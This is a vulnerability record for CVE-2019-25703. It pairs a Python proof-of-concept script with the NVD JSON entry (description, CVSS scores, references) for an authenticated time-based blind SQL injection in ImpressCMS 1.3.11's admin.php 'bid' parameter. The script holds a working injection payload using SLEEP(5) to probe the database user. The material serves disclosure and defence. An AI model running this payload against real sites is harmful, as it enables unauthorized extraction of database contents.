CVE-2019-25703

import requests import time # Exploit Title: ImpressCMS 1.3.11 - SQL Injection (Authenticated) # Date: 2019-01-14 # Exploit Author: VulnCheck # CVE: CVE-2019-25703 target_url = "http://target-site/impresscms/admin.php" # Replace with valid session cookie obtained after authentication cookies = { "ICMSSESSION": "valid_session_id_here" } # Time-based blind SQL injection payload # Checks if the first character of the database user is 'r' (ASCII 114) # If true, the database will sleep for 5 seconds payload = { "bid": "1 AND (SELECT 114 FROM DUAL WHERE SUBSTRING(USER(), 1, 1)=CHAR(114))=SLEEP(5)" } try: print("[*] Sending malicious request to check for SQL injection...") start_time = time.time() response = requests.post(target_url, data=payload, cookies=cookies) end_time = time.time() elapsed_time = end_time - start_time if elapsed_time >= 5: print("[+] Vulnerability confirmed! Response time: {:.2f} seconds".format(elapsed_time)) print("[+] The 'bid' parameter is vulnerable to time-based blind SQL injection.") else: print("[-] Vulnerability not detected or payload failed. Response time: {:.2f} seconds".format(elapsed_time)) except Exception as e: print("[-] An error occurred: {}".format(str(e)))

{"cve": {"id": "CVE-2019-25703", "sourceIdentifier": "[email protected]", "published": "2026-04-12T13:16:33.113", "lastModified": "2026-04-17T16:51:11.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values containing SQL commands to extract sensitive database information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:impresscms:impresscms:1.3.11:*:*:*:*:*:*:*", "matchCriteriaId": "00A97C38-579D-47B0-842B-C7577169D6B6"}]}]}], "references": [{"url": "http://www.impresscms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46239", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/impresscms-sql-injection-via-bid-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}